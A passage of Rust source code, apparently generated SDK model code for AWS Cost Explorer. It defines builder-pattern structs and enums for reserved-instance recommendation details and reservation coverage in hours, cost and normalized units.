        /// <p>The database engine that the recommended reservation supports.</p>
        pub fn set_database_engine(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.database_engine = input;
            self
        }
        /// <p>The database edition that the recommended reservation supports.</p>
        pub fn database_edition(mut self, input: impl Into<std::string::String>) -> Self {
            self.database_edition = Some(input.into());
            self
        }
        /// <p>The database edition that the recommended reservation supports.</p>
        pub fn set_database_edition(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.database_edition = input;
            self
        }
        /// <p>Determines whether the recommendation is for a reservation in a single Availability
        /// Zone or a reservation with a backup in a second Availability Zone.</p>
        pub fn deployment_option(mut self, input: impl Into<std::string::String>) -> Self {
            self.deployment_option = Some(input.into());
            self
        }
        /// <p>Determines whether the recommendation is for a reservation in a single Availability
        /// Zone or a reservation with a backup in a second Availability Zone.</p>
        pub fn set_deployment_option(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.deployment_option = input;
            self
        }
        /// <p>The license model that the recommended reservation supports.</p>
        pub fn license_model(mut self, input: impl Into<std::string::String>) -> Self {
            self.license_model = Some(input.into());
            self
        }
        /// <p>The license model that the recommended reservation supports.</p>
        pub fn set_license_model(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.license_model = input;
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance. </p>
        pub fn current_generation(mut self, input: bool) -> Self {
            self.current_generation = Some(input);
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance. </p>
        pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
            self.current_generation = input;
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn size_flex_eligible(mut self, input: bool) -> Self {
            self.size_flex_eligible = Some(input);
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
            self.size_flex_eligible = input;
            self
        }
        /// Consumes the builder and constructs a [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
        pub fn build(self) -> crate::model::RdsInstanceDetails {
            crate::model::RdsInstanceDetails {
                family: self.family,
                instance_type: self.instance_type,
                region: self.region,
                database_engine: self.database_engine,
                database_edition: self.database_edition,
                deployment_option: self.deployment_option,
                license_model: self.license_model,
                // Booleans that were never set default to `false`.
                current_generation: self.current_generation.unwrap_or_default(),
                size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
            }
        }
    }
}
impl RdsInstanceDetails {
    /// Creates a new builder-style object to manufacture [`RdsInstanceDetails`](crate::model::RdsInstanceDetails)
    pub fn builder() -> crate::model::rds_instance_details::Builder {
        crate::model::rds_instance_details::Builder::default()
    }
}
/// <p>Details about the Amazon EC2 instances that Amazon Web Services recommends that you
/// purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2InstanceDetails {
    /// <p>The instance family of the recommended reservation.</p>
    pub family: std::option::Option<std::string::String>,
    /// <p>The type of instance that Amazon Web Services recommends.</p>
    pub instance_type: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region of the recommended reservation.</p>
    pub region: std::option::Option<std::string::String>,
    /// <p>The Availability Zone of the recommended reservation.</p>
    pub availability_zone: std::option::Option<std::string::String>,
    /// <p>The platform of the recommended reservation. The platform is the specific combination
    /// of operating system, license model, and software on an instance.</p>
    pub platform: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommended reservation is dedicated or shared.</p>
    pub tenancy: std::option::Option<std::string::String>,
    /// <p>Determines whether the recommendation is for a current-generation instance. </p>
    pub current_generation: bool,
    /// <p>Determines whether the recommended reservation is size flexible.</p>
    pub size_flex_eligible: bool,
}
impl std::fmt::Debug for Ec2InstanceDetails {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("Ec2InstanceDetails")
            .field("family", &self.family)
            .field("instance_type", &self.instance_type)
            .field("region", &self.region)
            .field("availability_zone", &self.availability_zone)
            .field("platform", &self.platform)
            .field("tenancy", &self.tenancy)
            .field("current_generation", &self.current_generation)
            .field("size_flex_eligible", &self.size_flex_eligible)
            .finish()
    }
}
/// See [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
pub mod ec2_instance_details {
    /// A builder for [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) family: std::option::Option<std::string::String>,
        pub(crate) instance_type: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) availability_zone: std::option::Option<std::string::String>,
        pub(crate) platform: std::option::Option<std::string::String>,
        pub(crate) tenancy: std::option::Option<std::string::String>,
        pub(crate) current_generation: std::option::Option<bool>,
        pub(crate) size_flex_eligible: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The instance family of the recommended reservation.</p>
        pub fn family(mut self, input: impl Into<std::string::String>) -> Self {
            self.family = Some(input.into());
            self
        }
        /// <p>The instance family of the recommended reservation.</p>
        pub fn set_family(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.family = input;
            self
        }
        /// <p>The type of instance that Amazon Web Services recommends.</p>
        pub fn instance_type(mut self, input: impl Into<std::string::String>) -> Self {
            self.instance_type = Some(input.into());
            self
        }
        /// <p>The type of instance that Amazon Web Services recommends.</p>
        pub fn set_instance_type(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.instance_type = input;
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
            self.region = Some(input.into());
            self
        }
        /// <p>The Amazon Web Services Region of the recommended reservation.</p>
        pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.region = input;
            self
        }
        /// <p>The Availability Zone of the recommended reservation.</p>
        pub fn availability_zone(mut self, input: impl Into<std::string::String>) -> Self {
            self.availability_zone = Some(input.into());
            self
        }
        /// <p>The Availability Zone of the recommended reservation.</p>
        pub fn set_availability_zone(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.availability_zone = input;
            self
        }
        /// <p>The platform of the recommended reservation. The platform is the specific combination
        /// of operating system, license model, and software on an instance.</p>
        pub fn platform(mut self, input: impl Into<std::string::String>) -> Self {
            self.platform = Some(input.into());
            self
        }
        /// <p>The platform of the recommended reservation. The platform is the specific combination
        /// of operating system, license model, and software on an instance.</p>
        pub fn set_platform(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.platform = input;
            self
        }
        /// <p>Determines whether the recommended reservation is dedicated or shared.</p>
        pub fn tenancy(mut self, input: impl Into<std::string::String>) -> Self {
            self.tenancy = Some(input.into());
            self
        }
        /// <p>Determines whether the recommended reservation is dedicated or shared.</p>
        pub fn set_tenancy(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.tenancy = input;
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance. </p>
        pub fn current_generation(mut self, input: bool) -> Self {
            self.current_generation = Some(input);
            self
        }
        /// <p>Determines whether the recommendation is for a current-generation instance. </p>
        pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
            self.current_generation = input;
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn size_flex_eligible(mut self, input: bool) -> Self {
            self.size_flex_eligible = Some(input);
            self
        }
        /// <p>Determines whether the recommended reservation is size flexible.</p>
        pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
            self.size_flex_eligible = input;
            self
        }
        /// Consumes the builder and constructs a [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
        pub fn build(self) -> crate::model::Ec2InstanceDetails {
            crate::model::Ec2InstanceDetails {
                family: self.family,
                instance_type: self.instance_type,
                region: self.region,
                availability_zone: self.availability_zone,
                platform: self.platform,
                tenancy: self.tenancy,
                // Booleans that were never set default to `false`.
                current_generation: self.current_generation.unwrap_or_default(),
                size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
            }
        }
    }
}
impl Ec2InstanceDetails {
    /// Creates a new builder-style object to manufacture [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
    pub fn builder() -> crate::model::ec2_instance_details::Builder {
        crate::model::ec2_instance_details::Builder::default()
    }
}
/// <p>Hardware specifications for the service that you want recommendations for.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ServiceSpecification {
    /// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
    /// recommendations for.</p>
    pub ec2_specification: std::option::Option<crate::model::Ec2Specification>,
}
impl std::fmt::Debug for ServiceSpecification {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("ServiceSpecification")
            .field("ec2_specification", &self.ec2_specification)
            .finish()
    }
}
/// See [`ServiceSpecification`](crate::model::ServiceSpecification)
pub mod service_specification {
    /// A builder for [`ServiceSpecification`](crate::model::ServiceSpecification)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) ec2_specification: std::option::Option<crate::model::Ec2Specification>,
    }
    impl Builder {
        /// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
        /// recommendations for.</p>
        pub fn ec2_specification(mut self, input: crate::model::Ec2Specification) -> Self {
            self.ec2_specification = Some(input);
            self
        }
        /// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
        /// recommendations for.</p>
        pub fn set_ec2_specification(
            mut self,
            input: std::option::Option<crate::model::Ec2Specification>,
        ) -> Self {
            self.ec2_specification = input;
            self
        }
        /// Consumes the builder and constructs a [`ServiceSpecification`](crate::model::ServiceSpecification)
        pub fn build(self) -> crate::model::ServiceSpecification {
            crate::model::ServiceSpecification {
                ec2_specification: self.ec2_specification,
            }
        }
    }
}
impl ServiceSpecification {
    /// Creates a new builder-style object to manufacture [`ServiceSpecification`](crate::model::ServiceSpecification)
    pub fn builder() -> crate::model::service_specification::Builder {
        crate::model::service_specification::Builder::default()
    }
}
/// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
/// recommendations for.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2Specification {
    /// <p>Indicates whether you want a recommendation for standard or convertible
    /// reservations.</p>
    pub offering_class: std::option::Option<crate::model::OfferingClass>,
}
impl std::fmt::Debug for Ec2Specification {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("Ec2Specification")
            .field("offering_class", &self.offering_class)
            .finish()
    }
}
/// See [`Ec2Specification`](crate::model::Ec2Specification)
pub mod ec2_specification {
    /// A builder for [`Ec2Specification`](crate::model::Ec2Specification)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) offering_class: std::option::Option<crate::model::OfferingClass>,
    }
    impl Builder {
        /// <p>Indicates whether you want a recommendation for standard or convertible
        /// reservations.</p>
        pub fn offering_class(mut self, input: crate::model::OfferingClass) -> Self {
            self.offering_class = Some(input);
            self
        }
        /// <p>Indicates whether you want a recommendation for standard or convertible
        /// reservations.</p>
        pub fn set_offering_class(
            mut self,
            input: std::option::Option<crate::model::OfferingClass>,
        ) -> Self {
            self.offering_class = input;
            self
        }
        /// Consumes the builder and constructs a [`Ec2Specification`](crate::model::Ec2Specification)
        pub fn build(self) -> crate::model::Ec2Specification {
            crate::model::Ec2Specification {
                offering_class: self.offering_class,
            }
        }
    }
}
impl Ec2Specification {
    /// Creates a new builder-style object to manufacture [`Ec2Specification`](crate::model::Ec2Specification)
    pub fn builder() -> crate::model::ec2_specification::Builder {
        crate::model::ec2_specification::Builder::default()
    }
}
/// Whether a Reserved Instance recommendation is for a standard or a
/// convertible reservation.
///
/// Variant order is preserved from the generated code because the derived
/// `Ord`/`PartialOrd` impls depend on it.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum OfferingClass {
    Convertible,
    Standard,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for OfferingClass {
    fn from(s: &str) -> Self {
        // Unrecognized wire values are preserved verbatim in `Unknown` so the
        // round trip through `as_str` is lossless.
        if s == "CONVERTIBLE" {
            Self::Convertible
        } else if s == "STANDARD" {
            Self::Standard
        } else {
            Self::Unknown(s.to_owned())
        }
    }
}
impl std::str::FromStr for OfferingClass {
    type Err = std::convert::Infallible;
    /// Parsing never fails: anything unrecognized becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(Self::from(s))
    }
}
impl OfferingClass {
    /// Returns the wire-format string for this offering class.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Convertible => "CONVERTIBLE",
            Self::Standard => "STANDARD",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns all wire-format values known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["CONVERTIBLE", "STANDARD"]
    }
}
impl AsRef<str> for OfferingClass {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Information about this specific recommendation, such as the timestamp for when Amazon Web Services made a specific recommendation.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendationMetadata {
    /// <p>The ID for this specific recommendation.</p>
    pub recommendation_id: std::option::Option<std::string::String>,
    /// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
    pub generation_timestamp: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendationMetadata {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("ReservationPurchaseRecommendationMetadata")
            .field("recommendation_id", &self.recommendation_id)
            .field("generation_timestamp", &self.generation_timestamp)
            .finish()
    }
}
/// See [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
pub mod reservation_purchase_recommendation_metadata {
    /// A builder for [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) recommendation_id: std::option::Option<std::string::String>,
        pub(crate) generation_timestamp: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The ID for this specific recommendation.</p>
        pub fn recommendation_id(mut self, input: impl Into<std::string::String>) -> Self {
            self.recommendation_id = Some(input.into());
            self
        }
        /// <p>The ID for this specific recommendation.</p>
        pub fn set_recommendation_id(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.recommendation_id = input;
            self
        }
        /// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
        pub fn generation_timestamp(mut self, input: impl Into<std::string::String>) -> Self {
            self.generation_timestamp = Some(input.into());
            self
        }
        /// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
        pub fn set_generation_timestamp(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.generation_timestamp = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
        pub fn build(self) -> crate::model::ReservationPurchaseRecommendationMetadata {
            crate::model::ReservationPurchaseRecommendationMetadata {
                recommendation_id: self.recommendation_id,
                generation_timestamp: self.generation_timestamp,
            }
        }
    }
}
impl ReservationPurchaseRecommendationMetadata {
    /// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
    pub fn builder() -> crate::model::reservation_purchase_recommendation_metadata::Builder {
        crate::model::reservation_purchase_recommendation_metadata::Builder::default()
    }
}
/// <p>The amount of instance usage that a reservation covered.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Coverage {
    /// <p>The amount of instance usage that the reservation covered, in hours.</p>
    pub coverage_hours: std::option::Option<crate::model::CoverageHours>,
    /// <p>The amount of instance usage that the reservation covered, in normalized units.</p>
    pub coverage_normalized_units: std::option::Option<crate::model::CoverageNormalizedUnits>,
    /// <p>The amount of cost that the reservation covered.</p>
    pub coverage_cost: std::option::Option<crate::model::CoverageCost>,
}
impl std::fmt::Debug for Coverage {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("Coverage")
            .field("coverage_hours", &self.coverage_hours)
            .field("coverage_normalized_units", &self.coverage_normalized_units)
            .field("coverage_cost", &self.coverage_cost)
            .finish()
    }
}
/// See [`Coverage`](crate::model::Coverage)
pub mod coverage {
    /// A builder for [`Coverage`](crate::model::Coverage)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) coverage_hours: std::option::Option<crate::model::CoverageHours>,
        pub(crate) coverage_normalized_units:
            std::option::Option<crate::model::CoverageNormalizedUnits>,
        pub(crate) coverage_cost: std::option::Option<crate::model::CoverageCost>,
    }
    impl Builder {
        /// <p>The amount of instance usage that the reservation covered, in hours.</p>
        pub fn coverage_hours(mut self, input: crate::model::CoverageHours) -> Self {
            self.coverage_hours = Some(input);
            self
        }
        /// <p>The amount of instance usage that the reservation covered, in hours.</p>
        pub fn set_coverage_hours(
            mut self,
            input: std::option::Option<crate::model::CoverageHours>,
        ) -> Self {
            self.coverage_hours = input;
            self
        }
        /// <p>The amount of instance usage that the reservation covered, in normalized units.</p>
        pub fn coverage_normalized_units(
            mut self,
            input: crate::model::CoverageNormalizedUnits,
        ) -> Self {
            self.coverage_normalized_units = Some(input);
            self
        }
        /// <p>The amount of instance usage that the reservation covered, in normalized units.</p>
        pub fn set_coverage_normalized_units(
            mut self,
            input: std::option::Option<crate::model::CoverageNormalizedUnits>,
        ) -> Self {
            self.coverage_normalized_units = input;
            self
        }
        /// <p>The amount of cost that the reservation covered.</p>
        pub fn coverage_cost(mut self, input: crate::model::CoverageCost) -> Self {
            self.coverage_cost = Some(input);
            self
        }
        /// <p>The amount of cost that the reservation covered.</p>
        pub fn set_coverage_cost(
            mut self,
            input: std::option::Option<crate::model::CoverageCost>,
        ) -> Self {
            self.coverage_cost = input;
            self
        }
        /// Consumes the builder and constructs a [`Coverage`](crate::model::Coverage)
        pub fn build(self) -> crate::model::Coverage {
            crate::model::Coverage {
                coverage_hours: self.coverage_hours,
                coverage_normalized_units: self.coverage_normalized_units,
                coverage_cost: self.coverage_cost,
            }
        }
    }
}
impl Coverage {
    /// Creates a new builder-style object to manufacture [`Coverage`](crate::model::Coverage)
    pub fn builder() -> crate::model::coverage::Builder {
        crate::model::coverage::Builder::default()
    }
}
/// <p>How much it costs to run an instance.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageCost {
    /// <p>How much an On-Demand Instance costs.</p>
    pub on_demand_cost: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CoverageCost {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained `DebugStruct` builder; output is identical to the
        // statement-per-field form.
        f.debug_struct("CoverageCost")
            .field("on_demand_cost", &self.on_demand_cost)
            .finish()
    }
}
/// See [`CoverageCost`](crate::model::CoverageCost)
pub mod coverage_cost {
    /// A builder for [`CoverageCost`](crate::model::CoverageCost)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) on_demand_cost: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>How much an On-Demand Instance costs.</p>
        pub fn on_demand_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.on_demand_cost = Some(input.into());
            self
        }
        /// <p>How much an On-Demand Instance costs.</p>
        pub fn set_on_demand_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.on_demand_cost = input;
            self
        }
        /// Consumes the builder and constructs a [`CoverageCost`](crate::model::CoverageCost)
        pub fn build(self) -> crate::model::CoverageCost {
            crate::model::CoverageCost {
                on_demand_cost: self.on_demand_cost,
            }
        }
    }
}
impl CoverageCost {
    /// Creates a new builder-style object to manufacture [`CoverageCost`](crate::model::CoverageCost)
    pub fn builder() -> crate::model::coverage_cost::Builder {
        crate::model::coverage_cost::Builder::default()
    }
}
/// <p>The amount of instance usage, in normalized units. You can use normalized units to see
/// your EC2 usage for multiple sizes of instances in a uniform way. For example, suppose
/// that you run an xlarge instance and a 2xlarge instance. If you run both instances for
/// the same amount of time, the 2xlarge instance uses twice as much of your reservation as
/// the xlarge instance, even though both instances show only one instance-hour. When you
/// use normalized units instead of instance-hours, the xlarge instance used 8 normalized
/// units, and the 2xlarge instance used 16 normalized units.</p>
/// <p>For more information, see <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ri-modifying.html">Modifying Reserved Instances</a>
/// in the <i>Amazon Elastic Compute Cloud User Guide for Linux
/// Instances</i>.</p>
///
/// Construct values of this type with [`CoverageNormalizedUnits::builder`](crate::model::CoverageNormalizedUnits).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageNormalizedUnits {
    /// <p>The number of normalized units that are covered by On-Demand Instances instead of a
    /// reservation.</p>
    pub on_demand_normalized_units: std::option::Option<std::string::String>,
    /// <p>The number of normalized units that a reservation covers.</p>
    pub reserved_normalized_units: std::option::Option<std::string::String>,
    /// <p>The total number of normalized units that you used.</p>
    pub total_running_normalized_units: std::option::Option<std::string::String>,
    /// <p>The percentage of your used instance normalized units that a reservation
    /// covers.</p>
    pub coverage_normalized_units_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CoverageNormalizedUnits {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CoverageNormalizedUnits")
            .field(
                "on_demand_normalized_units",
                &self.on_demand_normalized_units,
            )
            .field("reserved_normalized_units", &self.reserved_normalized_units)
            .field(
                "total_running_normalized_units",
                &self.total_running_normalized_units,
            )
            .field(
                "coverage_normalized_units_percentage",
                &self.coverage_normalized_units_percentage,
            )
            .finish()
    }
}
/// See [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
pub mod coverage_normalized_units {
    /// A builder for [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) on_demand_normalized_units: std::option::Option<std::string::String>,
        pub(crate) reserved_normalized_units: std::option::Option<std::string::String>,
        pub(crate) total_running_normalized_units: std::option::Option<std::string::String>,
        pub(crate) coverage_normalized_units_percentage: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The number of normalized units that are covered by On-Demand Instances instead of a
        /// reservation.</p>
        pub fn on_demand_normalized_units(mut self, input: impl Into<std::string::String>) -> Self {
            self.on_demand_normalized_units = Some(input.into());
            self
        }
        /// <p>The number of normalized units that are covered by On-Demand Instances instead of a
        /// reservation.</p>
        pub fn set_on_demand_normalized_units(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.on_demand_normalized_units = input;
            self
        }
        /// <p>The number of normalized units that a reservation covers.</p>
        pub fn reserved_normalized_units(mut self, input: impl Into<std::string::String>) -> Self {
            self.reserved_normalized_units = Some(input.into());
            self
        }
        /// <p>The number of normalized units that a reservation covers.</p>
        pub fn set_reserved_normalized_units(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.reserved_normalized_units = input;
            self
        }
        /// <p>The total number of normalized units that you used.</p>
        pub fn total_running_normalized_units(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.total_running_normalized_units = Some(input.into());
            self
        }
        /// <p>The total number of normalized units that you used.</p>
        pub fn set_total_running_normalized_units(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_running_normalized_units = input;
            self
        }
        /// <p>The percentage of your used instance normalized units that a reservation
        /// covers.</p>
        pub fn coverage_normalized_units_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.coverage_normalized_units_percentage = Some(input.into());
            self
        }
        /// <p>The percentage of your used instance normalized units that a reservation
        /// covers.</p>
        pub fn set_coverage_normalized_units_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.coverage_normalized_units_percentage = input;
            self
        }
        /// Consumes the builder and constructs a [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
        pub fn build(self) -> crate::model::CoverageNormalizedUnits {
            crate::model::CoverageNormalizedUnits {
                on_demand_normalized_units: self.on_demand_normalized_units,
                reserved_normalized_units: self.reserved_normalized_units,
                total_running_normalized_units: self.total_running_normalized_units,
                coverage_normalized_units_percentage: self.coverage_normalized_units_percentage,
            }
        }
    }
}
impl CoverageNormalizedUnits {
    /// Creates a new builder-style object to manufacture [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
    pub fn builder() -> crate::model::coverage_normalized_units::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>How long a running instance either used a reservation or was On-Demand.</p>
///
/// Construct values of this type with [`CoverageHours::builder`](crate::model::CoverageHours).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageHours {
    /// <p>The number of instance running hours that On-Demand Instances covered.</p>
    pub on_demand_hours: std::option::Option<std::string::String>,
    /// <p>The number of instance running hours that reservations covered.</p>
    pub reserved_hours: std::option::Option<std::string::String>,
    /// <p>The total instance usage, in hours.</p>
    pub total_running_hours: std::option::Option<std::string::String>,
    /// <p>The percentage of instance hours that a reservation covered.</p>
    pub coverage_hours_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CoverageHours {
    /// Formats the value via the standard `debug_struct` builder chain.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CoverageHours")
            .field("on_demand_hours", &self.on_demand_hours)
            .field("reserved_hours", &self.reserved_hours)
            .field("total_running_hours", &self.total_running_hours)
            .field("coverage_hours_percentage", &self.coverage_hours_percentage)
            .finish()
    }
}
/// See [`CoverageHours`](crate::model::CoverageHours)
pub mod coverage_hours {
    /// A builder for [`CoverageHours`](crate::model::CoverageHours)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) on_demand_hours: std::option::Option<std::string::String>,
        pub(crate) reserved_hours: std::option::Option<std::string::String>,
        pub(crate) total_running_hours: std::option::Option<std::string::String>,
        pub(crate) coverage_hours_percentage: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The number of instance running hours that On-Demand Instances covered.</p>
        pub fn on_demand_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.on_demand_hours = Some(input.into());
            self
        }
        /// <p>The number of instance running hours that On-Demand Instances covered.</p>
        pub fn set_on_demand_hours(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.on_demand_hours = input;
            self
        }
        /// <p>The number of instance running hours that reservations covered.</p>
        pub fn reserved_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.reserved_hours = Some(input.into());
            self
        }
        /// <p>The number of instance running hours that reservations covered.</p>
        pub fn set_reserved_hours(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.reserved_hours = input;
            self
        }
        /// <p>The total instance usage, in hours.</p>
        pub fn total_running_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_running_hours = Some(input.into());
            self
        }
        /// <p>The total instance usage, in hours.</p>
        pub fn set_total_running_hours(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_running_hours = input;
            self
        }
        /// <p>The percentage of instance hours that a reservation covered.</p>
        pub fn coverage_hours_percentage(mut self, input: impl Into<std::string::String>) -> Self {
            self.coverage_hours_percentage = Some(input.into());
            self
        }
        /// <p>The percentage of instance hours that a reservation covered.</p>
        pub fn set_coverage_hours_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.coverage_hours_percentage = input;
            self
        }
        /// Consumes the builder and constructs a [`CoverageHours`](crate::model::CoverageHours)
        pub fn build(self) -> crate::model::CoverageHours {
            crate::model::CoverageHours {
                on_demand_hours: self.on_demand_hours,
                reserved_hours: self.reserved_hours,
                total_running_hours: self.total_running_hours,
                coverage_hours_percentage: self.coverage_hours_percentage,
            }
        }
    }
}
impl CoverageHours {
    /// Creates a new builder-style object to manufacture [`CoverageHours`](crate::model::CoverageHours)
    pub fn builder() -> crate::model::coverage_hours::Builder {
        // `Builder` derives `Default`; start from its zero value.
        Default::default()
    }
}
/// <p>Reservation coverage for a specified period, in hours.</p>
///
/// Construct values of this type with [`CoverageByTime::builder`](crate::model::CoverageByTime).
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageByTime {
